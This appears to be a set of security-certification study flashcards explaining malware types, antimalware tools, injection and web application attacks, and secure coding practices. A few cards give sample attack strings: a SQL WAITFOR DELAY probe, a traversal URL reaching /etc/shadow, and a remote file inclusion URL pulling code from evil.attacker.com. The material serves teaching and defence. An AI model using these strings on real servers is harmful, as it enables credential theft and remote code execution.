Domain 8. Chapter 21 Flashcards

1
Q

Domain 8. Chapter 21
1. Malware
2. Malware prevention
3. Application Attacks
4. Injection Vulnerabilities
5. Exploiting Authorization Vulnerabilities
6. Exploiting Web Application Vulnerabilities
7. Application Security Controls
8. Secure Coding Practices

A
2
Q
1. Malware
The script kiddie is a malicious individual who doesn’t understand the technology behind security vulnerabilities but downloads ready-to-use software (or scripts) from the internet and uses it to launch attacks against remote systems.
Advanced persistent threats (APTs) are sophisticated adversaries with advanced technical skills and significant financial resources.
A
3
Q

1.1 Viruses
Like biological viruses, computer viruses have two main functions—propagation and payload execution.

1.1.1 Virus Propagation Techniques
- Master Boot Record (MBR) Viruses: These viruses attack the MBR—the portion of bootable media (such as a hard disk or flash drive) that the computer uses to load the operating system during the boot process. Most MBR viruses are spread between systems through the use of infected media inadvertently shared between users. If the infected media is in the drive during the boot process, the target system reads the infected MBR, and the virus loads into memory, infects the MBR on the target system’s hard drive, and spreads its infection to yet another machine.
- File Infector Viruses
Many viruses infect different types of executable files and trigger when the operating system attempts to execute them. For Windows-based systems, file infector viruses commonly affect executable files and scripts, such as those ending with .exe, .com, and .msc extensions. Standard file infector viruses that do not use cloaking techniques such as stealth or encryption (see the section “Virus Technologies,” later in this chapter) are often easily detected by comparing file characteristics (such as size and modification date) before and after infection or by comparing hash values.
A variation of the file infector virus is the companion virus. These viruses are self-contained executable files that escape detection by using a filename similar to, but slightly different from, a legitimate operating system file.
- Macro Viruses
Macro viruses exploit the scripting functionality that applications offer to automate repetitive tasks, most commonly the Visual Basic for Applications (VBA) programming language.
- Service Injection Viruses: Another technique used to infect systems and escape detection is injecting the virus into trusted runtime processes of the operating system, such as svchost.exe, winlogon.exe, and explorer.exe.
One of the best techniques to protect systems against service injection is to ensure that all software allowing the viewing of web content (browsers, media players, helper applications) receives current security patches.

A
4
Q

1.1.2 Virus Technologies
This section examines four specific types of viruses that use sneaky techniques in an attempt to escape detection:
- Multipartite Viruses: Multipartite viruses use more than one propagation technique in an attempt to penetrate systems that defend against only one method or the other.
- Stealth Viruses: Stealth viruses hide themselves by actually tampering with the operating system to fool antivirus packages into thinking that everything is functioning normally.
- Polymorphic Viruses: Polymorphic viruses actually modify their own code as they travel from system to system.
- Encrypted Viruses: Encrypted viruses use cryptographic techniques to avoid detection. However, they do not generate these modified signatures by changing their code; instead, they alter the way they are stored on the disk.

A
5
Q

1.1.3 Hoaxes
A virus hoax is a message that warns of “the latest virus threat roaming the internet”.

A
6
Q

1.2 Logic Bombs
Logic bombs are malicious code objects that infect a system and lie dormant until they are triggered by the occurrence of one or more conditions such as time, program launch, website logon, certain keystrokes, and so on.

A
7
Q

1.4 Trojan Horses
A Trojan horse is a software program that appears benevolent but carries a malicious, behind-the-scenes payload that has the potential to wreak havoc on a system or network.
Remote access Trojans (RATs) are a subcategory of Trojans that open backdoors in systems that grant the attacker remote administrative control of the infected system.
Cryptomalware: Trojans designed to steal computing power from infected systems for use in mining Bitcoin or other cryptocurrencies.

A
8
Q

1.5 Worms
Worms pose a significant risk to network security. They contain the same destructive potential as other malicious code objects with an added twist—they propagate themselves without requiring any human intervention.

- Code Red Worm spread among web servers running unpatched versions of Microsoft’s Internet Information Server (IIS) in 2001. 1) It randomly selected hundreds of Internet Protocol (IP) addresses and then probed those addresses to see whether they were used by hosts running a vulnerable version of IIS. 2) It defaced HTML pages on the local web server. 3) It planted a logic bomb that would initiate a denial-of-service attack against the IP address 198.137.240.91, which at that time belonged to the web server hosting the White House’s home page.

- Stuxnet
In mid-2010, a worm named Stuxnet surfaced on the internet.
Stuxnet uses the following propagation techniques:
- Searching for unprotected administrative shares of systems on the local network
- Exploiting zero-day vulnerabilities in the Windows Server service and Windows Print Spooler service
- Connecting to systems using a default database password
- Spreading by the use of shared infected USB drives.

While Stuxnet spread from system to system with impunity, it was actually searching for a very specific type of system—one using a controller manufactured by Siemens and allegedly used in the production of material for nuclear weapons. When it found such a system, it executed a series of actions designed to destroy centrifuges attached to the Siemens controller.

Stuxnet appeared to begin its spread in the Middle East, specifically on systems located in Iran.

A
9
Q

1.6 Spyware and Adware
Spyware monitors your actions and transmits important details to a remote system that spies on your activity. For example, spyware might wait for you to log into a banking website and then transmit your username and password to the creator of the spyware. Alternatively, it might wait for you to enter your credit card number on an ecommerce site and transmit it to a fraudster to resell on the black market.

Adware, while quite similar to spyware in form, has a different purpose. It uses a variety of techniques to display advertisements on infected computers. The simplest forms of adware display pop-up ads on your screen while you surf the web. More nefarious versions may monitor your shopping behavior and redirect you to competitor websites.

Both spyware and adware fit into a category of software known as potentially unwanted programs (PUPs).

A
10
Q

1.7 Ransomware
Ransomware is a type of malware that weaponizes cryptography. After infecting a system through many of the same techniques used by other types of malware, ransomware then generates an encryption key known only to the ransomware author and uses that key to encrypt critical files on the system’s hard drive and any mounted drives. This encryption renders the data inaccessible to the authorized user or anyone else other than the malware author.
The user is then presented with a message notifying them that their files were encrypted and demanding payment of a ransom before a specific deadline to prevent the files from becoming permanently inaccessible. Some attackers go further and threaten that they will publicly release sensitive information if the ransom is not paid.

A
11
Q

1.8 Malicious Scripts
It’s not uncommon to find libraries of scripts written in languages such as PowerShell and Bash that execute sequences of command-line instructions in a highly automated fashion. For example, an administrator might write a PowerShell script that runs on a Windows domain each time a new user is added to the organization.
Unfortunately, this same scripting technology is available to improve the efficiency of malicious actors. For example, they might have a PowerShell script to run each time they gain access to a new Windows system that attempts a series of privilege escalation attacks.
Malicious scripts are also commonly found in a class of malware known as fileless malware.
For example, a user might receive a malicious link in a phishing message. That link might exploit a browser vulnerability to execute code that downloads and runs a PowerShell script entirely in memory, where it triggers a malicious payload.

A
12
Q

1.9 Zero-Day Attacks
Many forms of malicious code take advantage of zero-day vulnerabilities, security flaws discovered by hackers that have not been thoroughly addressed by the security community.
There are two main reasons systems are affected by these vulnerabilities:
- The necessary delay between the discovery of a new type of malicious code and the issuance of patches and antivirus updates. This is known as the window of vulnerability.
- Slowness in applying updates on the part of system administrators.

A
13
Q
1. Malware Prevention
2.1 Antimalware Software
83 percent of malware in existence targets the Windows platform.
Signature-based detection identifies potential virus infections on a system using a database that contains the telltale characteristics of all known viruses.
- If the software can eradicate the virus, it disinfects the affected files and restores the machine to a safe condition.
- If the software recognizes the virus but doesn’t know how to disinfect the files, it may quarantine the files until the user or an administrator can examine them manually.
- If security settings/policies do not provide for quarantine or the files exceed a predefined danger threshold, the antivirus package may delete the infected files in an attempt to preserve system integrity.

Heuristic mechanisms analyze the behavior of software, looking for the telltale signs of virus activity, such as attempts to elevate privilege level, cover their electronic tracks, and alter unrelated or operating system files. A common strategy is for systems to quarantine suspicious files and send them to a malware analysis tool, where they are executed in an isolated but monitored environment. If the software behaves suspiciously in that environment, it is added to blacklists throughout the organization, rapidly updating antivirus signatures to meet new threats.

A
14
Q

2.2 Integrity Monitoring
File integrity monitoring tools also provide a secondary antivirus function. These tools are designed to alert administrators to unauthorized file modifications. They work by maintaining a database of hash values for all files stored on the system. These archived hash values are then compared to current computed values to detect any files that were modified between the two periods.

A
15
Q

2.3 Advanced Threat Protection
Endpoint detection and response (EDR) packages combine the antimalware capabilities found in traditional antivirus packages with advanced techniques designed to better detect threats and take steps to eradicate them. Some of the specific capabilities of EDR packages are as follows:
- Analyzing endpoint memory, filesystem, and network activity for signs of malicious activity
- Automatically isolating possible malicious activity to contain the potential damage
- Integration with threat intelligence sources to obtain real-time insight into malicious behavior elsewhere on the internet
- Integration with other incident response mechanisms to automate response efforts.

Many security vendors offer EDR capabilities as a managed service offering where they provide installation, configuration, and monitoring services to reduce the load on customer security teams. These managed EDR offerings are known as managed detection and response (MDR) services.

User and entity behavior analytics (UEBA) packages pay particular attention to user-based activity on endpoints and other devices, building a profile of each individual’s normal activity and then highlighting deviations from that profile that may indicate a potential compromise. UEBA tools differ from EDR capabilities in that UEBA has an analytic focus on the user, whereas EDR has an analytic focus on the endpoint.

A
16
Q
1. Application Attacks
This section covers the specific techniques that attackers use to exploit vulnerabilities left behind by sloppy coding practices.
3.1 Buffer Overflows
Buffer overflow vulnerabilities exist when a developer does not properly validate user input to ensure that it is of an appropriate size. Input that is too large can “overflow” a data structure to affect other data stored in the computer’s memory.
In the worst case, that data can be used to overwrite system commands, allowing an attacker to exploit the buffer overflow vulnerability to execute targeted commands on the server.
Any time a program variable allows user input, the programmer should take steps to ensure that each of the following conditions is met:
- The user can’t enter a value longer than the size of any buffer that will hold it (for example, a 10-letter word into a 5-letter string variable).
- The user can’t enter an invalid value for the variable types that will hold it (for example, a letter into a numeric variable).
- The user can’t enter a value that will cause the program to operate outside its specified parameters (for example, answer a “yes” or “no” question with “maybe”).
A
17
Q

3.2 Time of Check to Time of Use
Attackers can develop attacks based on the predictability of task execution.
The time of check (TOC) is the time at which the subject checks on the status of the object.
When the decision is made to access the object, the procedure accesses it at the time of use (TOU).
The difference between the TOC and the TOU is sometimes large enough for an attacker to replace the original object with another object that suits their own needs. Time of check to time of use (TOCTTOU or TOC/TOU) attacks are often called race conditions because the attacker is racing with the legitimate process to replace the object before it is used.
These attacks must be addressed in your security policy and in your security model. TOCTTOU attacks, race condition exploits, and communication disconnects are known as state attacks because they attack timing, data flow control, and transition between one system state to another.

A
18
Q

3.3 Backdoors
Backdoors are undocumented command sequences that allow individuals with knowledge of the backdoor to bypass normal access restrictions. They are often used during the development and debugging process to speed up the workflow and avoid forcing developers to continuously authenticate to the system.

A
19
Q

3.4 Privilege Escalation and Rootkits
Privilege escalation attacks expand access from a normal user account to more comprehensive, administrative access, often through the use of rootkits. Rootkits are freely available on the internet and exploit known vulnerabilities in various operating systems. Privilege escalation attacks may also be waged using fileless malware, malicious scripts, or other attack vectors. Administrators must keep themselves informed about new security patches released for operating systems used in their environment and apply these corrective measures consistently.

A
20
Q
  1. Injection Vulnerabilities
    Injection vulnerabilities are among the primary mechanisms that attackers use to break through a web application and gain access to the systems supporting that application. These vulnerabilities allow an attacker to supply some type of code to the web application as input and trick the web server into either executing that code or supplying it to another server to execute.
A
21
Q

4.1 SQL Injection Attacks
Web applications often receive input from users and use it to compose a database query that provides results that are sent back to a user.
SQL injection attacks may also be used to execute commands that modify records, drop tables, or perform other actions that violate the integrity and/or availability of databases.
Attackers use a technique called blind SQL injection to conduct an attack even when they don’t have the ability to view the results directly. We’ll discuss two forms of blind SQL injection: content-based and timing-based.

A
22
Q

4.1.1 Blind Content-Based SQL Injection
In a content-based blind SQL injection attack, the perpetrator sends input to the web application that tests whether the application is interpreting injected code before attempting to carry out an attack.

A

In a content-based blind SQL injection attack, the attacker sends input to the web application that checks whether the application is interpreting the injected code before attempting to carry out an attack.

23
Q

4.1.2 Blind Timing-Based SQL Injection
In addition to using the content returned by an application to assess susceptibility to blind SQL injection attacks, penetration testers may use the amount of time required to process a query as a channel for retrieving information from a database. For example, the command WAITFOR DELAY '00:00:15' instructs the database to wait 15 seconds before performing the next action.

This might seem like a strange attack, but it can actually be used to extract information from the database. For example, imagine that the Accounts database table used in the previous example contains an unencrypted field named Password. An attacker could use a timing-based attack to discover the password by checking it letter by letter.

A
24
Q

4.2 Code Injection Attacks
SQL injection attacks are a specific example of a general class of attacks known as code injection attacks.
Any environment that inserts user-supplied input into code written by an application developer may be vulnerable to a code injection attack.
For example, attackers might embed commands in text being sent as part of a Lightweight Directory Access Protocol (LDAP) query, conducting an LDAP injection attack. In this type of injection attack, the focus of the attack is on the back end of an LDAP directory service rather than a database server. If a web server front end uses a script to craft LDAP statements based on input from a user, then LDAP injection is potentially a threat. Just as with SQL injection, validation and escaping of input and defensive coding are essential to eliminate this threat.

XML injection is another type of injection attack, where the back-end target is an XML application. Again, input escaping and validation combat this threat. Commands may even attempt to load dynamically linked libraries (DLLs) containing malicious code in a DLL injection attack.

Cross-site scripting is an example of a code injection attack.

A
25
Q

4.3 Command Injection Attacks
In some cases, application code may reach back to the operating system to execute a command. This is especially dangerous because an attacker might exploit a flaw in the application and gain the ability to directly manipulate the operating system.

A
26
Q
  1. Exploiting Authorization Vulnerabilities
    5.1 Insecure Direct Object References
    In some cases, web developers design an application to directly retrieve information from a database based on an argument provided by the user in either a query string or a POST request.
    https://www.[companyname].com/getDocument.php?documentID=1842
This is dangerous because an attacker can easily view this URL and then modify it to attempt to retrieve other documents, such as in these examples:
    https://www.mycompany.com/getDocument.php?documentID=1841…
    If the application does not perform authorization checks, the user may be permitted to view information that exceeds their authority. This situation is known as an insecure direct object reference.
A
27
Q

5.2 Directory Traversal
Directory traversal attacks work when web servers allow the inclusion of operators that navigate directory paths and file system access controls don’t properly restrict access to files stored elsewhere on the server.
For example, consider an Apache web server that stores web content in the directory path /var/www/html/. A request that uses path navigation operators to climb out of /var/www/html/ and reach /etc/shadow would look like this:
http://www.mycompany.com/../../../etc/shadow

A
28
Q

5.3 File Inclusion
File inclusion attacks take directory traversal to the next level. Instead of simply retrieving a file from the local operating system and displaying it to the attacker, file inclusion attacks actually execute the code contained within a file, allowing the attacker to fool the web server into executing targeted code.
- Local file inclusion attacks seek to execute code stored in a file located elsewhere on the web server. They work in a manner very similar to a directory traversal attack. For example, an attacker might use the following URL to execute a file named attack.exe that is stored in the C:\www\uploads directory on a Windows server: http://www.mycompany.com/app.php?include=C:\www\uploads\attack.exe
- Remote file inclusion attacks allow the attacker to go a step further and execute code that is stored on a remote server. These attacks are especially dangerous because the attacker can directly control the code being executed without having to first store a file on the local server. For example, an attacker might use this URL to execute an attack file stored on a remote server: http://www.mycompany.com/app.php?include=http://evil.attacker.com/

A
29
Q
  1. Exploiting Web Application Vulnerabilities
    Web applications are complex ecosystems consisting of application code, web platforms, operating systems, databases, and interconnected application programming interfaces (APIs). The complexity of these environments, combined with the fact that they are often public-facing, makes many different types of attacks possible and provides fertile ground for penetration testers.
    6.1 Cross-Site Scripting (XSS)
    Cross-site scripting (XSS) attacks occur when web applications allow an attacker to perform HTML injection, inserting their own HTML code into a web page.
A
30
Q

6.1.1 Reflected XSS
XSS attacks commonly occur when an application allows reflected input. For example, an attacker inserts a script into a text box whose contents the application reflects back into the page.
The key to this attack is that it's possible to embed form input in a link. A malicious individual could create a web page with a link titled “Check your account at First Bank” and encode form input in the link. When the user visits the link, the web page appears to be an authentic First Bank website (because it is!) with the proper address in the toolbar and a valid digital certificate. However, the website would then execute the script included in the input by the malicious user, which appears to be part of the valid web page.
What's the answer to cross-site scripting?
-When creating web applications that allow any type of user input, developers must be sure to perform input validation.
-Output encoding is a set of related techniques that take user-supplied input and encode it using a series of rules that transform potentially dangerous content into a safe form.
A
31
Q

6.1.2 Stored/Persistent XSS
Another common technique is to store cross-site scripting code on a remote web server in an approach known as stored XSS. These attacks are described as persistent, because they remain on the server even when the attacker isn’t actively waging an attack.
The attacker inserts the malicious code into a text area on a public site, and the site keeps that text and displays it to other visitors.
A
32
Q

6.2 Request Forgery
Request forgery attacks exploit trust relationships and attempt to have users unwittingly execute commands against a remote server. They come in two forms: cross-site request forgery and server-side request forgery.

A
33
Q

6.2.1 Cross-Site Request Forgery (CSRF/XSRF)
Cross-site request forgery attacks, abbreviated as XSRF or CSRF attacks, are similar to cross-site scripting attacks but exploit a different trust relationship. XSS attacks exploit the trust that a user has in a website to execute code on the user’s computer. CSRF attacks instead exploit the trust that a remote site has in the user’s browser to execute commands on the user’s behalf.
Consider, for example, an online banking site. An attacker who wants to steal funds from user accounts might go to an online forum and post a message containing a link. That link actually goes directly into the money transfer site that issues a command to transfer funds to the attacker’s account. The attacker then leaves the link posted on the forum and waits for an unsuspecting user to come along and click the link. If the user happens to be logged into the banking site, the transfer succeeds.

A
34
Q

6.2.2 Server-Side Request Forgery (SSRF)
Server-side request forgery (SSRF) attacks exploit a similar vulnerability but instead of tricking a user’s browser into visiting a URL, they trick a server into visiting a URL based on user-supplied input. SSRF attacks are possible when a web application accepts URLs from a user as input and then retrieves information from that URL. If the server has access to non-public URLs, an SSRF attack can unintentionally disclose that information to an attacker.

A
35
Q

6.3 Session Hijacking
Session hijacking attacks occur when a malicious individual intercepts part of the communication between an authorized user and a resource and then uses a hijacking technique to take over the session and assume the identity of the authorized user. The following list includes some common techniques:
- Capturing details of the authentication between a client and server and using those details to assume the client’s identity
- Tricking the client into thinking the attacker’s system is the server, acting as the intermediary as the client sets up a legitimate connection with the server, and then disconnecting the client
- Accessing a web application using the cookie data of a user who did not properly close the connection or of a poorly designed application that does not properly manage authentication cookies
All of these techniques can have disastrous results for the end user and must be addressed with both administrative controls (such as anti-replay authentication techniques) and application controls (such as expiring cookies within a reasonable period of time).

A
36
Q
  1. Application Security Controls
A
37
Q

7.1 Input Validation
Applications that allow user input should perform validation of that input to reduce the likelihood that it contains an attack.
The most effective form of input validation uses input whitelisting (also known as allow listing), in which the developer describes the exact type of input that is expected from the user and then verifies that the input matches that specification before passing the input to other processes or servers.
In some cases it would be difficult to write logical rules that describe all valid submissions to a field that would also prevent the insertion of malicious code. In this case, developers might use input blacklisting (also known as block listing) to control user input. With this approach, developers do not try to explicitly describe acceptable input but instead describe potentially malicious input that must be blocked.

A
38
Q

7.2 Web Application Firewalls
The reality is that applications still sometimes contain injection flaws. This can occur when developer testing is insufficient or when vendors do not promptly supply patches to vulnerable applications.
A WAF sits in front of a web server and receives all network traffic headed to that server. It then scrutinizes the input headed to the application, performing input validation (whitelisting and/or blacklisting) before passing the input to the web server. This prevents malicious traffic from ever reaching the web server and acts as an important component of a layered defense against web application vulnerabilities.

A
39
Q

7.3 Database Security

A
40
Q

7.3.1 Parameterized Queries and Stored Procedures
Secure applications depend on secure databases to provide the content and transaction processing necessary to support business operations. Relational databases form the core of most modern applications, and securing these databases goes beyond just protecting them against SQL injection attacks. Cybersecurity professionals should have a strong understanding of secure database administration practices.
Parameterized queries let the developer prepare the SQL statement in advance and pass user input into it only as separately supplied parameters, so the input is never interpreted as SQL code. Stored procedures work in a similar manner, but the major difference is that the SQL code is not contained within the application but is stored on the database server. The client does not directly send SQL code to the database server. Instead, the client sends arguments to the server, which then inserts those arguments into a precompiled query template. This approach protects against injection attacks and also improves database performance.

A
41
Q

7.3.2 Obfuscation and Camouflage
Database administrators should take the following measures to protect against data exposure:
- Data minimization is the best defense. Organizations should not collect sensitive information that they don’t need and should dispose of any sensitive information that they do collect as soon as it is no longer needed for a legitimate business purpose.
- Tokenization replaces personal identifiers that might directly reveal an individual’s identity with a unique identifier using a lookup table. For example, we might replace a widely known value, such as a student ID, with a randomly generated 10-digit number.
- Hashing uses a cryptographic hash function to replace sensitive identifiers with an irreversible alternative identifier. Salting these values with a random number prior to hashing them makes these hashed values resistant to a type of attack known as a rainbow table attack.

A
42
Q

7.4 Code Security

A
43
Q

7.4.1 Code Signing
Code signing provides developers with a way to confirm the authenticity of their code to end users. Developers use a cryptographic function to digitally sign their code with their own private key, and then browsers can use the developer’s public key to verify that signature and ensure that the code is legitimate and was not modified by unauthorized individuals. In cases where there is a lack of code signing, users may inadvertently run inauthentic code.

A
44
Q

7.4.2 Code Reuse
Many organizations reuse code not only internally but by making use of third-party software libraries and software development kits (SDKs). Third-party software libraries are a very common way to share code among developers.
Organizations trying to make libraries more accessible to developers often publish SDKs. SDKs are collections of software libraries combined with documentation, examples, and other resources designed to help programmers get up and running quickly in a development environment. SDKs also often include specialized utilities designed to help developers design and test code.
It’s fairly common for security flaws to arise in shared code, making it extremely important to know these dependencies and remain vigilant about security updates.

A
45
Q

7.4.3 Software Diversity
Security professionals should watch for places in the organization that are dependent on a single piece of source code, binary executable files, or compiler. Although it may not be possible to eliminate all of these dependencies, tracking them is a critical part of maintaining a secure codebase.

A
46
Q

7.4.4 Code Repositories
Code repositories are centralized locations for the storage and management of application source code. The main purpose of a code repository is to store the source files used in software development in a centralized location that allows for secure storage and the coordination of changes among multiple developers.

Code repositories also perform version control, allowing the tracking of changes and the rollback of code to earlier versions when required. They also meet the needs of security and auditing professionals who want to ensure that software development includes automated auditing and logging of changes. Code repositories also help avoid the problem of dead code, where code is in use in an organization but nobody is responsible for the maintenance of that code and, in fact, nobody may even know where the original source files reside.

A
47
Q

7.4.5 Integrity Measurement
Cybersecurity teams should also work hand in hand with developers and operations teams to ensure that applications are provisioned and deprovisioned in a secure manner through the organization’s approved release management process.

This process should include code integrity measurement. Code integrity measurement uses cryptographic hash functions to verify that the code being released into production matches the code that was previously approved. Any deviation in hash values indicates that code was modified, either intentionally or unintentionally, and requires further investigation prior to release.

A
48
Q

7.4.6 Application Resilience
When we design applications, we should create them in a manner that makes them resilient in the face of changing demand. We do this through the application of two related principles:
- Scalability says that applications should be designed so that computing resources they require may be incrementally added to support increasing demand. This may include adding more resources to an existing computing instance, which is known as vertical scaling or “scaling up.” It may also include adding additional instances to a pool, which is known as horizontal scaling, or “scaling out.”
- Elasticity goes a step further than scalability and says that applications should be able to automatically provision resources to scale when necessary and then automatically deprovision those resources to reduce capacity (and cost) when they are no longer needed. You can think of elasticity as the ability to scale both up and down on an as-needed basis.

A
49
Q
8. Secure Coding Practices
8.1 Source Code Comments
Developers should take steps to ensure that commented versions of their code remain secret. In the case of compiled executables, this is unnecessary, because the compiler automatically removes comments from executable files.
A
50
Q

8.2 Error Handling
Developers must anticipate unexpected situations and write error handling code that steps in and handles these situations in a secure fashion. Improper error handling may expose code to unacceptable levels of risk.

Many programming languages include try…catch functionality that allows developers to explicitly specify how errors should be handled. In this approach, the developer writes code that may cause an error and includes it in a try clause. When the code executes, if it does cause an error, the catch clause specifies how the application should handle that error situation.

A
51
Q

8.3 Hard-Coded Credentials
In some cases, developers may include usernames and passwords in source code. There are two variations on this error. First, the developer may create a hard-coded maintenance account for the application that allows the developer to regain access even if the authentication system fails. This is known as a backdoor.

The second variation of hard-coding credentials occurs when developers include access credentials for other services within their source code. If that code is intentionally or accidentally disclosed, those credentials then become known to outsiders.
This occurs quite often when developers accidentally publish code into a public code repository, such as GitHub, that contains API keys or other hard-coded credentials.

A
52
Q

8.4 Memory Management

A
53
Q

8.4.1 Resource Exhaustion
Whether intentional or accidental, systems may consume all of the memory, storage, processing time, or other resources available on the system, rendering it disabled or crippled for other uses. This is resource exhaustion.
Memory leaks are one example of resource exhaustion.
If an application requests memory from the operating system, it will eventually no longer need that memory and should then return the memory to the operating system for other uses. In the case of an application with a memory leak, the application fails to return some memory that it no longer needs, perhaps by simply losing track of an object that it has written to a reserved area of memory. If the application continues to do this over a long period of time, it can slowly consume all of the memory available to the system, causing it to crash. Rebooting the system often resets the problem, returning the memory to other uses, but if the memory leak isn’t corrected, the cycle simply begins anew.

A
54
Q

8.4.2 Pointer Dereferencing
Memory pointers can also cause security issues. Pointers are a commonly used concept in application development. They are an area of memory that stores an address of another location in memory.
One particular issue that might arise is if the pointer is empty, containing what programmers call a NULL value. If the application tries to dereference this NULL pointer, it causes a condition known as a null pointer exception. In the best case, a NULL pointer exception causes the program to crash, providing an attacker with access to debugging information that may be used for reconnaissance of the application’s security. In the worst case, a NULL pointer exception may allow an attacker to bypass security controls. Security professionals should work with application developers to help them avoid these issues.

A